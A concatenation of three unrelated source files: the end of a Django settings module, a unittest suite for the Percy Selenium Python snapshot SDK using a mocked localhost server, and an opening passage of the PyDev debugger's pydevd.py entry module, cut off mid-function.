'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
test_snapshot.py
|
import unittest
from unittest.mock import patch
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import httpretty
from selenium.webdriver import Firefox, FirefoxOptions
from percy import percy_snapshot, percySnapshot
import percy.snapshot as local
LABEL = local.LABEL
# mock a simple webpage to snapshot
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(('Snapshot Me').encode('utf-8'))
def log_message(self, format, *args):
return
# daemon threads automatically shut down when the main process exits
mock_server = HTTPServer(('localhost', 8000), MockServerRequestHandler)
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
# mock helpers
def mock_healthcheck(fail=False, fail_how='error'):
health_body = '{ "success": true }'
health_headers = { 'X-Percy-Core-Version': '1.0.0' }
health_status = 200
if fail and fail_how == 'error':
health_body = '{ "success": false, "error": "test" }'
health_status = 500
elif fail and fail_how == 'wrong-version':
health_headers = { 'X-Percy-Core-Version': '2.0.0' }
elif fail and fail_how == 'no-version':
health_headers = {}
httpretty.register_uri(
httpretty.GET, 'http://localhost:5338/percy/healthcheck',
body=health_body,
adding_headers=health_headers,
status=health_status)
httpretty.register_uri(
httpretty.GET, 'http://localhost:5338/percy/dom.js',
body='window.PercyDOM = { serialize: () => document.documentElement.outerHTML };',
status=200)
def mock_snapshot(fail=False):
httpretty.register_uri(
httpretty.POST, 'http://localhost:5338/percy/snapshot',
body=('{ "success": ' + ('true' if not fail else 'false, "error": "test"') + '}'),
status=(500 if fail else 200))
class TestPercySnapshot(unittest.TestCase):
@classmethod
def setUpClass(cls):
options = FirefoxOptions()
options.add_argument('-headless')
cls.driver = Firefox(options=options)
@classmethod
def tearDownClass(cls):
cls.driver.quit()
def setUp(self):
# clear the cached value for testing
local.is_percy_enabled.cache_clear()
local.fetch_percy_dom.cache_clear()
self.driver.get('http://localhost:8000')
httpretty.enable()
def tearDown(self):
httpretty.disable()
httpretty.reset()
def test_throws_error_when_a_driver_is_not_provided(self):
with self.assertRaises(Exception):
percy_snapshot()
def test_throws_error_when_a_name_is_not_provided(self):
with self.assertRaises(Exception):
percy_snapshot(self.driver)
def test_disables_snapshots_when_the_healthcheck_fails(self):
mock_healthcheck(fail=True)
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Percy is not running, disabling snapshots')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_disables_snapshots_when_the_healthcheck_errors(self):
# no mocks will cause the request to throw an error
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Percy is not running, disabling snapshots')
self.assertEqual(len(httpretty.latest_requests()), 0)
def test_disables_snapshots_when_the_healthcheck_version_is_wrong(self):
mock_healthcheck(fail=True, fail_how='wrong-version')
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Unsupported Percy CLI version, 2.0.0')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_disables_snapshots_when_the_healthcheck_version_is_missing(self):
mock_healthcheck(fail=True, fail_how='no-version')
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(
f'{LABEL} You may be using @percy/agent which is no longer supported by this SDK. '
'Please uninstall @percy/agent and install @percy/cli instead. '
'https://docs.percy.io/docs/migrating-to-percy-cli')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_posts_snapshots_to_the_local_percy_server(self):
mock_healthcheck()
mock_snapshot()
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2', enable_javascript=True)
self.assertEqual(httpretty.last_request().path, '/percy/snapshot')
s1 = httpretty.latest_requests()[2].parsed_body
self.assertEqual(s1['name'], 'Snapshot 1')
self.assertEqual(s1['url'], 'http://localhost:8000/')
self.assertEqual(s1['dom_snapshot'], '<html><head></head><body>Snapshot Me</body></html>')
self.assertRegex(s1['client_info'], r'percy-selenium-python/\d+')
self.assertRegex(s1['environment_info'][0], r'selenium/\d+')
self.assertRegex(s1['environment_info'][1], r'python/\d+')
s2 = httpretty.latest_requests()[3].parsed_body
self.assertEqual(s2['name'], 'Snapshot 2')
self.assertEqual(s2['enable_javascript'], True)
def test_has_a_backwards_compatible_function(self):
mock_healthcheck()
mock_snapshot()
percySnapshot(browser=self.driver, name='Snapshot')
self.assertEqual(httpretty.last_request().path, '/percy/snapshot')
s1 = httpretty.latest_requests()[2].parsed_body
self.assertEqual(s1['name'], 'Snapshot')
self.assertEqual(s1['url'], 'http://localhost:8000/')
self.assertEqual(s1['dom_snapshot'], '<html><head></head><body>Snapshot Me</body></html>')
def test_handles_snapshot_errors(self):
mock_healthcheck()
mock_snapshot(fail=True)
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
mock_print.assert_any_call(f'{LABEL} Could not take DOM snapshot "Snapshot 1"')
if __name__ == '__main__':
unittest.main()
|
pydevd.py
|
'''
Entry point module (keep at root):
This module starts the debugger.
'''
import sys # @NoMove
if sys.version_info[:2] < (2, 6):
raise RuntimeError('The PyDev.Debugger requires Python 2.6 onwards to be run. If you need to use an older Python version, use an older version of the debugger.')
import atexit
from collections import defaultdict
from contextlib import contextmanager
from functools import partial
import itertools
import os
import traceback
import weakref
import getpass as getpass_mod
import functools
import pydevd_file_utils
from _pydev_bundle import pydev_imports, pydev_log
from _pydev_bundle._pydev_filesystem_encoding import getfilesystemencoding
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_bundle.pydev_override import overrides
from _pydev_imps._pydev_saved_modules import thread
from _pydev_imps._pydev_saved_modules import threading
from _pydev_imps._pydev_saved_modules import time
from _pydevd_bundle import pydevd_extension_utils, pydevd_frame_utils, pydevd_constants
from _pydevd_bundle.pydevd_filtering import FilesFiltering
from _pydevd_bundle import pydevd_io, pydevd_vm_type
from _pydevd_bundle import pydevd_utils
from _pydev_bundle.pydev_console_utils import DebugConsoleStdIn
from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info
from _pydevd_bundle.pydevd_breakpoints import ExceptionBreakpoint, get_exception_breakpoint
from _pydevd_bundle.pydevd_comm_constants import (CMD_THREAD_SUSPEND, CMD_STEP_INTO, CMD_SET_BREAK,
CMD_STEP_INTO_MY_CODE, CMD_STEP_OVER, CMD_SMART_STEP_INTO, CMD_RUN_TO_LINE,
CMD_SET_NEXT_STATEMENT, CMD_STEP_RETURN, CMD_ADD_EXCEPTION_BREAK, CMD_STEP_RETURN_MY_CODE,
CMD_STEP_OVER_MY_CODE, constant_to_str, CMD_STEP_INTO_COROUTINE)
from _pydevd_bundle.pydevd_constants import (IS_JYTH_LESS25, get_thread_id, get_current_thread_id,
dict_keys, dict_iter_items, DebugInfoHolder, PYTHON_SUSPEND, STATE_SUSPEND, STATE_RUN, get_frame,
clear_cached_thread_id, INTERACTIVE_MODE_AVAILABLE, SHOW_DEBUG_INFO_ENV, IS_PY34_OR_GREATER, IS_PY2, NULL,
NO_FTRACE, IS_IRONPYTHON, JSON_PROTOCOL, IS_CPYTHON, HTTP_JSON_PROTOCOL, USE_CUSTOM_SYS_CURRENT_FRAMES_MAP, call_only_once,
ForkSafeLock, IGNORE_BASENAMES_STARTING_WITH, EXCEPTION_TYPE_UNHANDLED)
from _pydevd_bundle.pydevd_defaults import PydevdCustomization # Note: import alias used on pydev_monkey.
from _pydevd_bundle.pydevd_custom_frames import CustomFramesContainer, custom_frames_container_init
from _pydevd_bundle.pydevd_dont_trace_files import DONT_TRACE, PYDEV_FILE, LIB_FILE, DONT_TRACE_DIRS
from _pydevd_bundle.pydevd_extension_api import DebuggerEventHandler
from _pydevd_bundle.pydevd_frame_utils import add_exception_to_frame, remove_exception_from_frame
from _pydevd_bundle.pydevd_net_command_factory_xml import NetCommandFactory
from _pydevd_bundle.pydevd_trace_dispatch import (
trace_dispatch as _trace_dispatch, global_cache_skips, global_cache_frame_skips, fix_top_level_trace_and_get_trace_func)
from _pydevd_bundle.pydevd_utils import save_main_module, is_current_thread_main_thread
from _pydevd_frame_eval.pydevd_frame_eval_main import (
frame_eval_func, dummy_trace_dispatch)
import pydev_ipython # @UnusedImport
from _pydevd_bundle.pydevd_source_mapping import SourceMapping
from pydevd_concurrency_analyser.pydevd_concurrency_logger import ThreadingLogger, AsyncioLogger, send_concurrency_message, cur_time
from pydevd_concurrency_analyser.pydevd_thread_wrappers import wrap_threads
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER
from pydevd_file_utils import get_fullname, get_package_dir
from os.path import abspath as os_path_abspath
import pydevd_tracing
from _pydevd_bundle.pydevd_comm import (InternalThreadCommand, InternalThreadCommandForAnyThread,
create_server_socket)
from _pydevd_bundle.pydevd_comm import(InternalConsoleExec,
_queue, ReaderThread, GetGlobalDebugger, get_global_debugger,
set_global_debugger, WriterThread,
start_client, start_server, InternalGetBreakpointException, InternalSendCurrExceptionTrace,
InternalSendCurrExceptionTraceProceeded)
from _pydevd_bundle.pydevd_daemon_thread import PyDBDaemonThread, mark_as_pydevd_daemon_thread
from _pydevd_bundle.pydevd_process_net_command_json import PyDevJsonCommandProcessor
from _pydevd_bundle.pydevd_process_net_command import process_net_command
from _pydevd_bundle.pydevd_net_command import NetCommand
from _pydevd_bundle.pydevd_breakpoints import stop_on_unhandled_exception
from _pydevd_bundle.pydevd_collect_bytecode_info import collect_try_except_info, collect_return_info
from _pydevd_bundle.pydevd_suspended_frames import SuspendedFramesManager
from socket import SHUT_RDWR
from _pydevd_bundle.pydevd_api import PyDevdAPI
from _pydevd_bundle.pydevd_timeout import TimeoutTracker
from _pydevd_bundle.pydevd_thread_lifecycle import suspend_all_threads, mark_thread_suspended
if USE_CUSTOM_SYS_CURRENT_FRAMES_MAP:
from _pydevd_bundle.pydevd_constants import constructed_tid_to_last_frame
__version_info__ = (2, 1, 0)
__version_info_str__ = []
for v in __version_info__:
__version_info_str__.append(str(v))
__version__ = '.'.join(__version_info_str__)
# IMPORTANT: pydevd_constants must be the 1st thing defined because it'll keep a reference to the original sys._getframe
def install_breakpointhook(pydevd_breakpointhook=None):
if pydevd_breakpointhook is None:
def pydevd_breakpointhook(*args, **kwargs):
hookname = os.getenv('PYTHONBREAKPOINT')
if (
hookname is not None
and len(hookname) > 0
and hasattr(sys, '__breakpointhook__')
and sys.__breakpointhook__ != pydevd_breakpointhook
):
sys.__breakpointhook__(*args, **kwargs)
else:
settrace(*args, **kwargs)
if sys.version_info[0:2] >= (3, 7):
# There are some choices on how to provide the breakpoint hook. Namely, we can provide a
# PYTHONBREAKPOINT which provides the import path for a method to be executed or we
# can override sys.breakpointhook.
# pydevd overrides sys.breakpointhook instead of providing an environment variable because
# it's possible that the debugger starts the user program but is not available in the
# PYTHONPATH (and would thus fail to be imported if PYTHONBREAKPOINT was set to pydevd.settrace).
# Note that the implementation still takes PYTHONBREAKPOINT in account (so, if it was provided
# by someone else, it'd still work).
sys.breakpointhook = pydevd_breakpointhook
else:
if sys.version_info[0] >= 3:
import builtins as __builtin__ # Py3 noqa
else:
import __builtin__ # noqa
# In older versions, breakpoint() isn't really available, so, install the hook directly
# in the builtins.
__builtin__.breakpoint = pydevd_breakpointhook
sys.__breakpointhook__ = pydevd_breakpointhook
# Install the breakpoint hook at import time.
install_breakpointhook()
SUPPORT_PLUGINS = not IS_JYTH_LESS25
PluginManager = None
if SUPPORT_PLUGINS:
from _pydevd_bundle.pydevd_plugin_utils import PluginManager
threadingEnumerate = threading.enumerate
threadingCurrentThread = threading.currentThread
try:
'dummy'.encode('utf-8') # Added because otherwise Jython 2.2.1 wasn't finding the encoding (if it wasn't loaded in the main thread).
except:
pass
_global_redirect_stdout_to_server = False
_global_redirect_stderr_to_server = False
file_system_encoding = getfilesystemencoding()
_CACHE_FILE_TYPE = {}
pydev_log.debug('Using GEVENT_SUPPORT: %s', pydevd_constants.SUPPORT_GEVENT)
pydev_log.debug('pydevd __file__: %s', os.path.abspath(__file__))
#=======================================================================================================================
# PyDBCommandThread
#=======================================================================================================================
class PyDBCommandThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._py_db_command_thread_event = py_db._py_db_command_thread_event
self.setName('pydevd.CommandThread')
@overrides(PyDBDaemonThread._on_run)
def _on_run(self):
# Delay a bit this initialization to wait for the main program to start.
self._py_db_command_thread_event.wait(0.3)
if self._kill_received:
return
try:
while not self._kill_received:
try:
self.py_db.process_internal_commands()
except:
pydev_log.info('Finishing debug communication...(2)')
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(0.3)
except:
try:
pydev_log.debug(sys.exc_info()[0])
except:
# In interpreter shutdown many things can go wrong (any module variables may
# be None, streams can be closed, etc).
pass
# only got this error in interpreter shutdown
# pydev_log.info('Finishing debug communication...(3)')
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
# Set flag so that it can exit before the usual timeout.
self._py_db_command_thread_event.set()
#=======================================================================================================================
# CheckAliveThread
# Non-daemon thread: guarantees that all data is written even if program is finished
#=======================================================================================================================
class CheckAliveThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self.setName('pydevd.CheckAliveThread')
self.daemon = False
self._wait_event = threading.Event()
@overrides(PyDBDaemonThread._on_run)
def _on_run(self):
py_db = self.py_db
def can_exit():
with py_db._main_lock:
# Note: it's important to get the lock besides checking that it's empty (this
# means that we're not in the middle of some command processing).
writer = py_db.writer
writer_empty = writer is not None and writer.empty()
return not py_db.has_user_threads_alive() and writer_empty
try:
while not self._kill_received:
self._wait_event.wait(0.3)
if can_exit():
break
py_db.check_output_redirect()
if can_exit():
pydev_log.debug("No threads alive, finishing debug session")
py_db.dispose_and_kill_all_pydevd_threads()
except:
pydev_log.exception()
def join(self, timeout=None):
# If someone tries to join this thread, mark it to be killed.
# This is the case for CherryPy when auto-reload is turned on.
self.do_kill_pydev_thread()
PyDBDaemonThread.join(self, timeout=timeout)
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
# Set flag so that it can exit before the usual timeout.
self._wait_event.set()
class AbstractSingleNotificationBehavior(object):
'''
The basic usage should be:
# Increment the request time for the suspend.
single_notification_behavior.increment_suspend_time()
# Notify that this is a pause request (when a pause, not a breakpoint).
single_notification_behavior.on_pause()
# Mark threads to be suspended.
set_suspend(...)
# On do_wait_suspend, use notify_thread_suspended:
def do_wait_suspend(...):
with single_notification_behavior.notify_thread_suspended(thread_id):
...
'''
__slots__ = [
'_last_resume_notification_time',
'_last_suspend_notification_time',
'_lock',
'_next_request_time',
'_suspend_time_request',
'_suspended_thread_ids',
'_pause_requested',
'_py_db',
]
NOTIFY_OF_PAUSE_TIMEOUT = .5
def __init__(self, py_db):
self._py_db = weakref.ref(py_db)
self._next_request_time = partial(next, itertools.count())
self._last_suspend_notification_time = -1
self._last_resume_notification_time = -1
self._suspend_time_request = self._next_request_time()
self._lock = thread.allocate_lock()
self._suspended_thread_ids = set()
self._pause_requested = False
def send_suspend_notification(self, thread_id, stop_reason):
raise AssertionError('abstract: subclasses must override.')
def send_resume_notification(self, thread_id):
raise AssertionError('abstract: subclasses must override.')
def increment_suspend_time(self):
with self._lock:
self._suspend_time_request = self._next_request_time()
def on_pause(self):
# Upon a pause, we should force sending new suspend notifications
# if no notification is sent after some time and there's some thread already stopped.
with self._lock:
self._pause_requested = True
global_suspend_time = self._suspend_time_request
py_db = self._py_db()
if py_db is not None:
py_db.timeout_tracker.call_on_timeout(
self.NOTIFY_OF_PAUSE_TIMEOUT,
self._notify_after_timeout,
kwargs={'global_suspend_time': global_suspend_time}
)
def _notify_after_timeout(self, global_suspend_time):
with self._lock:
if self._suspended_thread_ids:
if global_suspend_time > self._last_suspend_notification_time:
self._last_suspend_notification_time = global_suspend_time
# Notify about any thread which is currently suspended.
pydev_log.info('Sending suspend notification after timeout.')
self.send_suspend_notification(next(iter(self._suspended_thread_ids)), CMD_THREAD_SUSPEND)
def on_thread_suspend(self, thread_id, stop_reason):
with self._lock:
pause_requested = self._pause_requested
if pause_requested:
# When a suspend notification is sent, reset the pause flag.
self._pause_requested = False
self._suspended_thread_ids.add(thread_id)
# CMD_THREAD_SUSPEND should always be a side-effect of a break, so, only
# issue for a CMD_THREAD_SUSPEND if a pause is pending.
if stop_reason != CMD_THREAD_SUSPEND or pause_requested:
if self._suspend_time_request > self._last_suspend_notification_time:
pydev_log.info('Sending suspend notification.')
self._last_suspend_notification_time = self._suspend_time_request
self.send_suspend_notification(thread_id, stop_reason)
else:
pydev_log.info(
'Suspend not sent (it was already sent). Last suspend % <= Last resume %s',
self._last_suspend_notification_time,
self._last_resume_notification_time,
)
else:
pydev_log.info(
'Suspend not sent because stop reason is thread suspend and pause was not requested.',
)
def on_thread_resume(self, thread_id):
# on resume (step, continue all):
with self._lock:
self._suspended_thread_ids.remove(thread_id)
if self._last_resume_notification_time < self._last_suspend_notification_time:
pydev_log.info('Sending resume notification.')
self._last_resume_notification_time = self._last_suspend_notification_time
self.send_resume_notification(thread_id)
else:
pydev_log.info(
'Resume not sent (it was already sent). Last resume %s >= Last suspend %s',
self._last_resume_notification_time,
self._last_suspend_notification_time,
)
@contextmanager
def notify_thread_suspended(self, thread_id, stop_reason):
self.on_thread_suspend(thread_id, stop_reason)
try:
yield # At this point the thread must be actually suspended.
finally:
self.on_thread_resume(thread_id)
class ThreadsSuspendedSingleNotification(AbstractSingleNotificationBehavior):
__slots__ = AbstractSingleNotificationBehavior.__slots__ + [
'multi_threads_single_notification', '_callbacks', '_callbacks_lock']
def __init__(self, py_db):
AbstractSingleNotificationBehavior.__init__(self, py_db)
# If True, pydevd will send a single notification when all threads are suspended/resumed.
self.multi_threads_single_notification = False
self._callbacks_lock = threading.Lock()
self._callbacks = []
def add_on_resumed_callback(self, callback):
with self._callbacks_lock:
self._callbacks.append(callback)
@overrides(AbstractSingleNotificationBehavior.send_resume_notification)
def send_resume_notification(self, thread_id):
py_db = self._py_db()
if py_db is not None:
py_db.writer.add_command(py_db.cmd_factory.make_thread_resume_single_notification(thread_id))
with self._callbacks_lock:
callbacks = self._callbacks
self._callbacks = []
for callback in callbacks:
callback()
@overrides(AbstractSingleNotificationBehavior.send_suspend_notification)
def send_suspend_notification(self, thread_id, stop_reason):
py_db = self._py_db()
if py_db is not None:
py_db.writer.add_command(py_db.cmd_factory.make_thread_suspend_single_notification(py_db, thread_id, stop_reason))
@overrides(AbstractSingleNotificationBehavior.notify_thread_suspended)
@contextmanager
def notify_thread_suspended(self, thread_id, stop_reason):
if self.multi_threads_single_notification:
with AbstractSingleNotificationBehavior.notify_thread_suspended(self, thread_id, stop_reason):
yield
else:
yield
class _Authentication(object):
__slots__ = ['access_token', 'client_access_token', '_authenticated', '_wrong_attempts']
def __init__(self):
# A token to be send in the command line or through the settrace api -- when such token
# is given, the first message sent to the IDE must pass the same token to authenticate.
# Note that if a disconnect is sent, the same message must be resent to authenticate.
self.access_token = None
# This token is the one that the client requires to accept a connection from pydevd
# (it's stored here and just passed back when required, it's not used internally
# for anything else).
self.client_access_token = None
self._authenticated = None
self._wrong_attempts = 0
def is_authenticated(self):
if self._authenticated is None:
return self.access_token is None
return self._authenticated
def login(self, access_token):
if self._wrong_attempts >= 10: # A user can fail to authenticate at most 10 times.
return
self._authenticated = access_token == self.access_token
if not self._authenticated:
self._wrong_attempts += 1
else:
self._wrong_attempts = 0
def logout(self):
self._authenticated = None
self._wrong_attempts = 0
class PyDB(object):
""" Main debugging class
Lots of stuff going on here:
PyDB starts two threads on startup that connect to remote debugger (RDB)
The threads continuously read & write commands to RDB.
PyDB communicates with these threads through command queues.
Every RDB command is processed by calling process_net_command.
Every PyDB net command is sent to the net by posting NetCommand to WriterThread queue
Some commands need to be executed on the right thread (suspend/resume & friends)
These are placed on the internal command queue.
"""
# Direct child pids which should not be terminated when terminating processes.
# Note: class instance because it should outlive PyDB instances.
dont_terminate_child_pids = set()
def __init__(self, set_as_global=True):
if set_as_global:
pydevd_tracing.replace_sys_set_trace_func()
self.authentication = _Authentication()
self.reader = None
self.writer = None
self.created_pydb_daemon_threads = {}
self._waiting_for_connection_thread = None
self._on_configuration_done_event = threading.Event()
self.check_alive_thread = None
self.py_db_command_thread = None
self.quitting = None
self.cmd_factory = NetCommandFactory()
self._cmd_queue = defaultdict(_queue.Queue) # Key is thread id or '*', value is Queue
self.suspended_frames_manager = SuspendedFramesManager()
self._files_filtering = FilesFiltering()
self.timeout_tracker = TimeoutTracker(self)
# Note: when the source mapping is changed we also have to clear the file types cache
# (because if a given file is a part of the project or not may depend on it being
# defined in the source mapping).
self.source_mapping = SourceMapping(on_source_mapping_changed=self._clear_filters_caches)
# Determines whether we should terminate child processes when asked to terminate.
self.terminate_child_processes = True
# These are the breakpoints received by the PyDevdAPI. They are meant to store
# the breakpoints in the api -- its actual contents are managed by the api.
self.api_received_breakpoints = {}
# These are the breakpoints meant to be consumed during runtime.
self.breakpoints = {}
# Set communication protocol
PyDevdAPI().set_protocol(self, 0, PydevdCustomization.DEFAULT_PROTOCOL)
self.variable_presentation = PyDevdAPI.VariablePresentation()
# mtime to be raised when breakpoints change
self.mtime = 0
self.file_to_id_to_line_breakpoint = {}
self.file_to_id_to_plugin_breakpoint = {}
# Note: breakpoints dict should not be mutated: a copy should be created
# and later it should be assigned back (to prevent concurrency issues).
self.break_on_uncaught_exceptions = {}
self.break_on_caught_exceptions = {}
self.break_on_user_uncaught_exceptions = {}
self.ready_to_run = False
self._main_lock = thread.allocate_lock()
self._lock_running_thread_ids = thread.allocate_lock()
self._py_db_command_thread_event = threading.Event()
if set_as_global:
CustomFramesContainer._py_db_command_thread_event = self._py_db_command_thread_event
self.pydb_disposed = False
self._wait_for_threads_to_finish_called = False
self._wait_for_threads_to_finish_called_lock = thread.allocate_lock()
self._wait_for_threads_to_finish_called_event = threading.Event()
self.terminate_requested = False
self._disposed_lock = thread.allocate_lock()
self.signature_factory = None
self.SetTrace = pydevd_tracing.SetTrace
self.skip_on_exceptions_thrown_in_same_context = False
self.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
# Suspend debugger even if breakpoint condition raises an exception.
# May be changed with CMD_PYDEVD_JSON_CONFIG.
self.skip_suspend_on_breakpoint_exception = () # By default suspend on any Exception.
self.skip_print_breakpoint_exception = () # By default print on any Exception.
# By default user can step into properties getter/setter/deleter methods
self.disable_property_trace = False
self.disable_property_getter_trace = False
self.disable_property_setter_trace = False
self.disable_property_deleter_trace = False
# this is a dict of thread ids pointing to thread ids. Whenever a command is passed to the java end that
# acknowledges that a thread was created, the thread id should be passed here -- and if at some time we do not
# find that thread alive anymore, we must remove it from this list and make the java side know that the thread
# was killed.
self._running_thread_ids = {}
# Note: also access '_enable_thread_notifications' with '_lock_running_thread_ids'
self._enable_thread_notifications = False
self._set_breakpoints_with_id = False
# This attribute holds the file-> lines which have an @IgnoreException.
self.filename_to_lines_where_exceptions_are_ignored = {}
# working with plugins (lazily initialized)
self.plugin = None
self.has_plugin_line_breaks = False
self.has_plugin_exception_breaks = False
self.thread_analyser = None
self.asyncio_analyser = None
# matplotlib support in debugger and debug console
self.mpl_in_use = False
self.mpl_hooks_in_debug_console = False
self.mpl_modules_for_patching = {}
self._filename_to_not_in_scope = {}
self.first_breakpoint_reached = False
self._exclude_filters_enabled = self._files_filtering.use_exclude_filters()
self._is_libraries_filter_enabled = self._files_filtering.use_libraries_filter()
self.is_files_filter_enabled = self._exclude_filters_enabled or self._is_libraries_filter_enabled
self.show_return_values = False
self.remove_return_values_flag = False
self.redirect_output = False
# this flag disables frame evaluation even if it's available
self.use_frame_eval = True
# If True, pydevd will send a single notification when all threads are suspended/resumed.
self._threads_suspended_single_notification = ThreadsSuspendedSingleNotification(self)
# If True a step command will do a step in one thread and will also resume all other threads.
self.stepping_resumes_all_threads = False
self._local_thread_trace_func = threading.local()
self._server_socket_ready_event = threading.Event()
self._server_socket_name = None
# Bind many locals to the debugger because upon teardown those names may become None
# in the namespace (and thus can't be relied upon unless the reference was previously
# saved).
if IS_IRONPYTHON:
# A partial() cannot be used in IronPython for sys.settrace.
def new_trace_dispatch(frame, event, arg):
return _trace_dispatch(self, frame, event, arg)
self.trace_dispatch = new_trace_dispatch
else:
self.trace_dispatch = partial(_trace_dispatch, self)
self.fix_top_level_trace_and_get_trace_func = fix_top_level_trace_and_get_trace_func
self.frame_eval_func = frame_eval_func
self.dummy_trace_dispatch = dummy_trace_dispatch
# Note: this is different from pydevd_constants.thread_get_ident because we want Jython
# to be None here because it also doesn't have threading._active.
try:
self.threading_get_ident = threading.get_ident # Python 3
self.threading_active = threading._active
except:
try:
self.threading_get_ident = threading._get_ident # Python 2 noqa
self.threading_active = threading._active
except:
self.threading_get_ident = None # Jython
self.threading_active = None
self.threading_current_thread = threading.currentThread
self.set_additional_thread_info = set_additional_thread_info
self.stop_on_unhandled_exception = stop_on_unhandled_exception
self.collect_try_except_info = collect_try_except_info
self.collect_return_info = collect_return_info
self.get_exception_breakpoint = get_exception_breakpoint
self._dont_trace_get_file_type = DONT_TRACE.get
self._dont_trace_dirs_get_file_type = DONT_TRACE_DIRS.get
self.PYDEV_FILE = PYDEV_FILE
self.LIB_FILE = LIB_FILE
self._in_project_scope_cache = {}
self._exclude_by_filter_cache = {}
self._apply_filter_cache = {}
self._ignore_system_exit_codes = set()
# DAP related
self._dap_messages_listeners = []
if set_as_global:
# Set as the global instance only after it's initialized.
set_global_debugger(self)
# Stop the tracing as the last thing before the actual shutdown for a clean exit.
atexit.register(stoptrace)
def get_arg_ppid(self):
try:
setup = SetupHolder.setup
if setup:
return int(setup.get('ppid', 0))
except:
pydev_log.exception('Error getting ppid.')
return 0
def wait_for_ready_to_run(self):
while not self.ready_to_run:
# busy wait until we receive run command
self.process_internal_commands()
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(0.1)
def on_initialize(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self._on_configuration_done_event.clear()
def on_configuration_done(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self._on_configuration_done_event.set()
self._py_db_command_thread_event.set()
def is_attached(self):
return self._on_configuration_done_event.is_set()
def on_disconnect(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self.authentication.logout()
self._on_configuration_done_event.clear()
def set_ignore_system_exit_codes(self, ignore_system_exit_codes):
assert isinstance(ignore_system_exit_codes, (list, tuple, set))
self._ignore_system_exit_codes = set(ignore_system_exit_codes)
def ignore_system_exit_code(self, system_exit_exc):
if hasattr(system_exit_exc, 'code'):
return system_exit_exc.code in self._ignore_system_exit_codes
else:
return system_exit_exc in self._ignore_system_exit_codes
def block_until_configuration_done(self, cancel=None):
if cancel is None:
cancel = NULL
while not cancel.is_set():
if self._on_configuration_done_event.is_set():
cancel.set() # Set cancel to prevent reuse
return
self.process_internal_commands()
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(1 / 15.)
def add_fake_frame(self, thread_id, frame_id, frame):
self.suspended_frames_manager.add_fake_frame(thread_id, frame_id, frame)
def handle_breakpoint_condition(self, info, pybreakpoint, new_frame):
condition = pybreakpoint.condition
try:
if pybreakpoint.handle_hit_condition(new_frame):
return True
if not condition:
return False
return eval(condition, new_frame.f_globals, new_frame.f_locals)
except Exception as e:
if IS_PY2:
# Must be bytes on py2.
if isinstance(condition, unicode): # noqa
condition = condition.encode('utf-8')
if not isinstance(e, self.skip_print_breakpoint_exception):
sys.stderr.write('Error while evaluating expression: %s\n' % (condition,))
etype, value, tb = sys.exc_info()
traceback.print_exception(etype, value, tb.tb_next)
if not isinstance(e, self.skip_suspend_on_breakpoint_exception):
try:
# add exception_type and stacktrace into thread additional info
etype, value, tb = sys.exc_info()
error = ''.join(traceback.format_exception_only(etype, value))
stack = traceback.extract_stack(f=tb.tb_frame.f_back)
# On self.set_suspend(thread, CMD_SET_BREAK) this info will be
# sent to the client.
info.conditional_breakpoint_exception = \
('Condition:\n' + condition + '\n\nError:\n' + error, stack)
except:
pydev_log.exception()
return True
return False
finally:
etype, value, tb = None, None, None
def handle_breakpoint_expression(self, pybreakpoint, info, new_frame):
try:
try:
val = eval(pybreakpoint.expression, new_frame.f_globals, new_frame.f_locals)
except:
